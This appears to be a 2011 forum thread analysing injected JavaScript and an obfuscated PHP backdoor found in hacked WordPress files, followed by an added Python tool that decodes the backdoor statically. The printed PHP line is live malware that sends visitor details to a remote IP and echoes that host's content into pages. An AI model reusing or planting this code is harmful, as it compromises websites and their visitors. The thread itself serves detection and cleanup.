Malware Domain List
Malware Related => Malware Analysis => Topic started by: foks on September 09, 2011, 06:50:40 am
-
On some sites I have seen a new javascript starting with <script id="googleblogcontainer">. You can see the entire script on http://sakrare.ikyon.se/log.php?id=12396.
The script is encrypted and requests the file http://91.196.216.30/counter.php. That script seems very innocent:
function remove(element) {
var parent = element.parentNode;
parent.removeChild(element);
}
var my = document.getElementById('googleblogcounter');
my.src = 'http://code.jquery.com/jquery-1.4.2.min.js?ver=3.0.1';
remove(my);
var my = document.getElementById('googleblogcontainer');
my.src = 'http://code.jquery.com/jquery-1.4.2.min.js?ver=3.0.1';
remove(my);
I have not been able to find out what the script tries to do next. 91.196.216.30 is not blacklisted in Google but is on the same network as counter-wordpress.com and superpuperdomain2.com. 91.196.216.30 has also been used in the TimThumb attacks against WordPress sites.
-
The WordPress hacking continues
In all my index files and WordPress theme files I have this >:(
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
Decoded to
<?php $url = 'hxxp://91.196.216.30/bt.php'; ?>
Just google 'hxxp://91.196.216.30/bt.php' and see the infected site results :-[
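A static decoder for the two-stage $_X / eval(base64_decode()) wrapper quoted in the post above, added here as an example and not code from the thread. It replays base64_decode(), the strtr() alphabet swap and the __FILE__ substitution in Python without ever evaluating anything, so the hidden URL can be pulled out of an infected file safely; the SAMPLE string (the loader part of the injected line), the regexes and the placeholder file path are constructed for this example.

```python
import base64
import re

# Constructed sample: the obfuscated prologue from the thread, without the
# trailing file_get_contents()/echo part (only the two base64 stages matter).
SAMPLE = (
    "<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';"
    "eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7"
    "JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));"
)

PAYLOAD_RE = re.compile(r"\$_X='([A-Za-z0-9+/=]+)'")
LOADER_RE = re.compile(r"eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)")
STRTR_RE = re.compile(r"strtr\(\$_X,'([^']*)','([^']*)'\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def decode_loader(php_source):
    """Return the plaintext of the eval(base64_decode(...)) stage, or None."""
    m = LOADER_RE.search(php_source)
    return base64.b64decode(m.group(1)).decode("latin-1") if m else None


def decode_payload(php_source, file_path="/var/www/index.php"):
    """Replay the loader statically: base64-decode $_X, apply the strtr()
    alphabets read from the loader itself, substitute __FILE__ as
    ereg_replace() would. file_path is a placeholder; nothing is executed."""
    loader = decode_loader(php_source)
    m = PAYLOAD_RE.search(php_source)
    if loader is None or not m:
        return None
    raw = base64.b64decode(m.group(1)).decode("latin-1")
    swap = STRTR_RE.search(loader)
    if swap:  # PHP strtr() with equal-length strings == str.translate()
        raw = raw.translate(str.maketrans(swap.group(1), swap.group(2)))
    return raw.replace("__FILE__", "'" + file_path + "'")


def analyze(php_source):
    """Summarise an infected file: loader text, strtr alphabets, decoded
    payload and every URL the payload contains (for blocklists/IOC notes)."""
    loader = decode_loader(php_source) or ""
    swap = STRTR_RE.search(loader)
    payload = decode_payload(php_source) or ""
    return {
        "loader": loader,
        "strtr": swap.groups() if swap else None,
        "payload": payload,
        "urls": URL_RE.findall(payload),
    }
```

Run analyze() over the contents of each suspect index.php or theme file; the "urls" entry gives the callback host to block while the rest of the injected line (file_get_contents() of that URL with ip/host/uri/ua/ref appended, then echo) is left untouched.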